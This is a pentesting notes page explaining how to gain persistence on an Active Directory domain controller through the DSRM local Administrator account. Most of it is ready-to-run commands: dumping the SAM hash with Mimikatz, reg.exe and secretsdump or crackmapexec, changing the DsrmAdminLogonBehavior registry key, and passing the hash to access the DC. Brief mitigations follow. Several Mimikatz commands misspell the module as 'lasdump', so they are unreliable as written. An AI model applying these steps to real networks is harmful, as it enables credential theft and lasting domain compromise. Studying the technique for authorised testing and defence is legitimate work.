☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Steps
  • Step 1 - Dump the SAM of the DC to Obtain the DSRM Hash
  • Step 2 - Setup to Authenticate as local Admin
  • Step 3 - Pass the hash
  • To reset the "DsrmAdminLogonBehavior" Property
  • Mitigations
  1. Windows
  2. Active Directory
  3. Persistence

Directory Services Restore Mode (DSRM)

PreviousCustom Security Service Providers (SSP's)NextModifying Remote Protocol Security Descriptors

Last updated 3 years ago

In every domain there is a Domain Admin named 'Administrator'. However, on every Domain Controller there is also a local Administrator. These two users are different.

How can we tell?

If you have Domain Admin privileges, dump both the SAM and the NTDS and you will get two different hashes for 'Administrator'.

The differences can also be seen using these Mimikatz commands respectively as well:

Invoke-Mimikatz -Command '"token::elevate" "lasdump::sam"'
Invoke-Mimikatz -Command '"lasdump::lsa /patch"'

The Administrator hash from the SAM dump belongs to the local Administrator and the NTDS hash to the Domain Administrator.

The local Administrator on the DC is also known as the DSRM account.

What does this mean?

In general, the local Administrator account is hardly used on a running DC. However, to configure a Domain Controller, we are prompted to enter a DSRM password for the local Administrator. This provides a backup method for the Domain Admins to access the DC and the database.

This means that obtaining the local DC Administrator hash and then passing it provides another long-term method of persistence. It can be quite effective because the DSRM password is rarely changed.

As the local Admin is usually not able to logon to the DC, we must first make sure that we will be able to logon by changing the "DsrmAdminLogonBehavior" registry key. This will be a significant downgrade to the security of the Domain Controller. Therefore, if you are on a live engagement, make sure to check with your client that this is allowable.

Steps

Step 1 - Dump the SAM of the DC to Obtain the DSRM Hash

  • Method 1: From Powershell - Use Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lasdump::sam"'
  • Method 2: Copy the SAM and system hives, download them, then run secretsdump.py from impacket to extract the hash

# using reg.exe
cmd.exe /c 'reg.exe save hklm\sam c:\windows\temp\sam.bak'
cmd.exe /c 'reg.exe save hklm\system c:\windows\temp\system.bak'

# after copying the files to your machine run secretsdump.py
python secretsdump.py -sam sam.bak -system system.bak LOCAL
  • Method 3: From Linux - use crackmapexec or secretsdump.py to extract the hash remotely

# crackmapexec
crackmapexec smb <dc-ip> -u <user> -p <pass> --sam

# secretsdump.py
sudo python3 secretsdump.py <user>@<domain> -dc-ip <ip>

Step 2 - Setup to Authenticate as local Admin

From the DC...

# Check if 'DsrmAdminLogonBehavior' property exists
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

# If there is no value, create a new property and set it to 2
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Then check again and make sure 'DsrmAdminLogonBehavior' is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

Step 3 - Pass the hash

  • From another machine, attempt to logon to the DC

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<dc.domain> /user:Administrator /ntlm:<DSRM-hash> /run:powershell.exe"'

# From your new window check your access to the DC
ls \\<dc.domain>\C$

To reset the "DsrmAdminLogonBehavior" Property

# If the property didn't exist beforehand
Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"

# If there was a "DsrmAdminLogonBehavior" registry key set prior
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name "DsrmAdminLogonBehavior" -Value <prior_value>

Mitigations

  • Change the DSRM password regularly

  • Check regularly for events with ID 4657 or 4794

  • Make sure DSRM passwords are unqiue for each DC

Once we have the hash we can either use that hash and pass it to access the DC or we can follow up with a and pull up the passwords for any account you wish, including the krbtgt.

DCSync attack